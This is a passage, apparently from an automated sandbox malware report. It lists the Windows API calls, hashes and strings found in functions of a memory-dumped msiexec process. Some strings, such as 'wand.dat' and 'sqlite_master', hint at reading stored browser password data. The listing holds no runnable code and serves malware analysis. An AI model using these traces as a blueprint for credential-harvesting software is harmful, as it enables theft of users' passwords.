                                                                                                          • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                          • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3384217055-0
                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$memcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 368790112-0
                                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                          APIs
                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                          • String ID:
                                                                                                          • API String ID: 1889144086-0
                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                          APIs
                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                          • String ID:
                                                                                                          • API String ID: 1661045500-0
                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                          APIs
                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                          Strings
                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                          • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1549203181-0
                                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3550944819-0
                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                          APIs
                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$free
                                                                                                          • String ID: g4@
                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                                          • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1865533344-0
                                                                                                          • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                          • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1127616056-0
                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID: sqlite_master
                                                                                                          • API String ID: 438689982-3163232059
                                                                                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                          APIs
                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3917621476-0
                                                                                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 822687973-0
                                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2605342592-0
                                                                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2678498856-0
                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 3888421826-0
                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3727323765-0
                                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2754987064-0
                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
